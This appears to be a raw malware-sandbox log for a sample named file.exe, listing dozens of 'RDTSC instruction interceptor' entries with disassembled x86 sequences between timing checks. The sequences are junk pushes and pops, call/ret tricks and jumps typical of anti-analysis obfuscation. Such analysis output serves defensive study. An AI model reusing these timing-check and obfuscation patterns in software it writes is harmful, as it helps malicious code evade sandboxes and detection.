Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5947D1 second address: 5947E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5997F6 second address: 599800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0084E2F646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59996B second address: 5999A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0085357C27h 0x00000009 jmp 00007F0085357C28h 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5999A5 second address: 5999AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599DFF second address: 599E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D503 second address: 59D520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F659h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D95A second address: 59D95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D95F second address: 59D98B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0084E2F659h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnp 00007F0084E2F650h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59DB81 second address: 59DBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F0085357C2Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0085357C20h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E09E second address: 59E0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0084E2F646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E1BA second address: 59E1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E2DD second address: 59E2E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E4D9 second address: 59E4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59EBA8 second address: 59EBAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A04A3 second address: 5A04BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F3A0 second address: 59F3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A04BB second address: 5A0565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0085357C20h 0x0000000e nop 0x0000000f jmp 00007F0085357C1Eh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F0085357C18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 js 00007F0085357C1Ch 0x00000036 add edi, 75DD5200h 0x0000003c mov dword ptr [ebp+1247AD7Eh], edx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F0085357C18h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e mov edi, dword ptr [ebp+122D2D5Ch] 0x00000064 xchg eax, ebx 0x00000065 jmp 00007F0085357C20h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F0085357C21h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F3A5 second address: 59F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007F0084E2F654h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F3B7 second address: 59F3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0FF4 second address: 5A1038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d jmp 00007F0084E2F650h 0x00000012 pop eax 0x00000013 pop edi 0x00000014 nop 0x00000015 mov esi, edi 0x00000017 push 00000000h 0x00000019 mov si, ax 0x0000001c push 00000000h 0x0000001e jmp 00007F0084E2F651h 0x00000023 xchg eax, ebx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007F0084E2F646h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1B54 second address: 5A1B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0085357C1Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0D8E second address: 5A0D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A18E7 second address: 5A18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1B69 second address: 5A1B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F653h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A18EB second address: 5A18F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A18F0 second address: 5A1906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F0084E2F64Ch 0x00000010 jng 00007F0084E2F646h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A266E second address: 5A2672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A309F second address: 5A30A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A30A3 second address: 5A30AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0085357C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A3ADF second address: 5A3B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F0084E2F648h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov di, bx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F0084E2F648h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2EB0h] 0x00000048 mov si, 5654h 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007F0084E2F648h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 0000001Ch 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 push eax 0x00000069 push edi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F0084E2F64Bh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A3894 second address: 5A3899 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A3899 second address: 5A38A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A621D second address: 5A6221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A66ED second address: 5A6754 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0084E2F65Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D3B65h], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F0084E2F648h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add edi, dword ptr [ebp+122D2CFCh] 0x00000036 mov ebx, edi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F0084E2F64Bh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A86E6 second address: 5A86EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A86EA second address: 5A86F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A68C7 second address: 5A68CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8830 second address: 5A8847 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A68CB second address: 5A68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8906 second address: 5A890A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A69C3 second address: 5A69C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A890A second address: 5A8913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC681 second address: 5AC685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AA791 second address: 5AA7A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0084E2F646h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F0084E2F648h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB826 second address: 5AB82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB82A second address: 5AB82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB903 second address: 5AB909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB909 second address: 5AB91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0084E2F64Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB91E second address: 5AB922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AE5AE second address: 5AE5B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD70F second address: 5AD715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD715 second address: 5AD719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD719 second address: 5AD7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or bl, FFFFFFF1h 0x0000000e mov dword ptr [ebp+122D346Ah], esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F0085357C18h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, dword ptr [ebp+122D2D74h] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 add ebx, dword ptr [ebp+122D2FBCh] 0x00000048 mov eax, dword ptr [ebp+122D0219h] 0x0000004e mov ebx, eax 0x00000050 and di, FFA8h 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edx 0x0000005a call 00007F0085357C18h 0x0000005f pop edx 0x00000060 mov dword ptr [esp+04h], edx 0x00000064 add dword ptr [esp+04h], 0000001Bh 0x0000006c inc edx 0x0000006d push edx 0x0000006e ret 0x0000006f pop edx 0x00000070 ret 0x00000071 add di, A592h 0x00000076 push eax 0x00000077 push esi 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD7A5 second address: 5AD7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD7A9 second address: 5AD7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B15A4 second address: 5B15AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B15AE second address: 5B15B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B4661 second address: 5B466E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B466E second address: 5B46BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0085357C18h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1DBDh], edi 0x00000029 mov dword ptr [ebp+122D1F7Dh], eax 0x0000002f push 00000000h 0x00000031 js 00007F0085357C1Ch 0x00000037 mov dword ptr [ebp+122D35E4h], edi 0x0000003d push 00000000h 0x0000003f movsx ebx, di 0x00000042 mov dword ptr [ebp+124519A2h], edx 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5643 second address: 5B5675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0084E2F64Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f ja 00007F0084E2F64Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0084E2F64Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B759B second address: 5B75C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0085357C1Dh 0x00000012 je 00007F0085357C16h 0x00000018 jnp 00007F0085357C16h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B75C3 second address: 5B75CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B75CC second address: 5B75D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B75D1 second address: 5B75F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0084E2F659h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BC05D second address: 5BC07A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0085357C2Fh 0x00000008 jmp 00007F0085357C23h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 558065 second address: 55808F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F0084E2F665h 0x0000000b jmp 00007F0084E2F64Ch 0x00000010 jmp 00007F0084E2F653h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3731 second address: 5C374B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0085357C1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C374B second address: 5C3755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0084E2F646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3975 second address: 3EECA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7787B100h 0x00000010 jno 00007F0085357C27h 0x00000016 push dword ptr [ebp+122D0F9Dh] 0x0000001c jl 00007F0085357C1Eh 0x00000022 call dword ptr [ebp+122D3B17h] 0x00000028 pushad 0x00000029 sub dword ptr [ebp+122D308Dh], edi 0x0000002f jmp 00007F0085357C28h 0x00000034 xor eax, eax 0x00000036 xor dword ptr [ebp+122D1C71h], ebx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 sub dword ptr [ebp+122D1C71h], ecx 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D2EB8h], eax 0x0000004e clc 0x0000004f mov esi, 0000003Ch 0x00000054 xor dword ptr [ebp+122D3071h], esi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e stc 0x0000005f lodsw 0x00000061 mov dword ptr [ebp+122D1F26h], edi 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jbe 00007F0085357C1Ch 0x00000071 add dword ptr [ebp+122D1F26h], ecx 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D2372h], ebx 0x00000081 push eax 0x00000082 pushad 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9447 second address: 5C944D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9CC2 second address: 5C9CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9CCA second address: 5C9CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9CD0 second address: 5C9D04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F0085357C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jne 00007F0085357C16h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007F0085357C20h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0085357C1Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA1A5 second address: 5CA1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA1B1 second address: 5CA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007F0085357C1Fh 0x0000000b jmp 00007F0085357C1Eh 0x00000010 pop ebx 0x00000011 jbe 00007F0085357C18h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA35A second address: 5CA35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA35F second address: 5CA36A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F0085357C16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD4E5 second address: 5CD4E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55648F second address: 556493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1CDF second address: 5D1CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B06D4 second address: 5B06D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
